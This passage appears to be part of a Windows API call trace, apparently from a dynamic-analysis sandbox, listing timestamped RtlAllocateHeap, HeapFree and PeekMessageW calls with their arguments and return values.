0xbfe2a8 [0257.420] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.420] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01978 [0257.420] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01978 | out: hHeap=0xbc0000) returned 1 [0257.420] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9c40 [0257.420] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01978 [0257.420] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01978 | out: hHeap=0xbc0000) returned 1 [0257.420] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0257.420] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9c40 | out: hHeap=0xbc0000) returned 1 [0257.420] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.420] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b58 | out: hHeap=0xbc0000) returned 1 [0257.420] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.420] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.420] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b58 [0257.420] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.420] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9c40 [0257.420] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01978 [0257.420] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01978 | out: hHeap=0xbc0000) returned 1 [0257.420] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.420] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01978 [0257.420] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01978 | out: hHeap=0xbc0000) returned 1 [0257.420] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9c40 | out: hHeap=0xbc0000) returned 1 [0257.420] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0257.420] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.420] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b58 | out: hHeap=0xbc0000) returned 1 [0257.420] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.421] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9c40 [0257.421] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01b58 [0257.421] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9c40 | out: hHeap=0xbc0000) returned 1 [0257.421] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b58 | out: hHeap=0xbc0000) returned 1 [0257.421] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0257.421] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.421] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b58 [0257.421] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.421] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.421] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01978 [0257.421] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01978 | out: hHeap=0xbc0000) returned 1 [0257.421] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9c40 [0257.421] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01978 [0257.421] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01978 | out: hHeap=0xbc0000) returned 1 [0257.421] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0257.421] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9c40 | out: hHeap=0xbc0000) returned 1 [0257.421] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.421] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b58 | out: hHeap=0xbc0000) returned 1 [0257.421] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.421] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.421] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b58 [0257.421] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.421] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9c40 [0257.421] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01978 [0257.421] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01978 | out: hHeap=0xbc0000) returned 1 [0257.421] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.421] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01978 [0257.421] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01978 | out: hHeap=0xbc0000) returned 1 [0257.421] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9c40 | out: hHeap=0xbc0000) returned 1 [0257.421] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0257.421] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.421] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b58 | out: hHeap=0xbc0000) returned 1 [0257.421] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.421] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9c40 [0257.421] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01b58 [0257.421] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9c40 | out: hHeap=0xbc0000) returned 1 [0257.421] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b58 | out: hHeap=0xbc0000) returned 1 [0257.422] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0257.422] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.422] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b58 [0257.422] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.422] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.422] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01978 [0257.422] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.422] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.422] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b58 [0257.422] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.422] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9c40 [0257.422] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01978 [0257.422] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.422] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b58 [0257.422] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.422] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.422] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01978 [0257.422] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.422] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.422] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b58 [0257.423] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.423] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9c40 [0257.423] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01978 [0257.423] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.423] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b58 [0257.423] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.423] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.423] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01978 [0257.423] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.423] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.423] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.423] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b58 [0257.423] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.423] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9c40 [0257.423] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01978 [0257.423] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.423] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc019c8 [0257.423] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.423] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc019c8 [0257.423] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.423] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda690 [0257.423] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc019b8 [0257.423] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01978 [0257.423] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x1) returned 0xc01998 [0257.424] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.424] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc019c8 [0257.424] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.424] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.424] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01978 [0257.424] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01998 [0257.424] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x1) returned 0xc019b8 [0257.424] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.424] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.424] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b58 [0257.424] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.424] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda690 [0257.424] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc019a8 [0257.424] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.424] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b58 [0257.424] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.424] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.424] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc019a8 [0257.424] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.424] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.424] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b58 [0257.424] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.424] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda690 [0257.424] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc019a8 [0257.424] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.424] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b58 [0257.424] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.424] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.424] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc019a8 [0257.425] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.425] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.425] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b58 [0257.425] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.425] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda690 [0257.425] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc019a8 [0257.425] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.425] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b58 [0257.425] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.425] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.425] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc019a8 [0257.425] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.425] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.425] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b58 [0257.425] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.425] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda690 [0257.425] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc019a8 [0257.425] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.425] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b58 [0257.425] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.425] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.425] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc019a8 [0257.425] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.425] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.425] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b58 [0257.425] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.425] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda690 [0257.426] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc019a8 [0257.426] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.426] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b58 [0257.426] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.426] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.426] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc019a8 [0257.426] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.426] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.426] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b58 [0257.426] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.426] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda690 [0257.426] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc019a8 [0257.426] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.426] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b58 [0257.426] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.426] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.426] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc019a8 [0257.426] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.426] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.426] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b58 [0257.426] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.426] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda690 [0257.426] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc019a8 [0257.426] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.426] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b58 [0257.426] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.427] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.427] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.427] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.427] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.427] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.427] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.427] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.427] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.427] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.427] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.427] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.427] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.427] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.427] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.427] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.427] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.427] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.427] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.428] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.428] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.428] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.428] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.428] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.428] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.428] PeekMessageW (in: lpMsg=0x7df984, 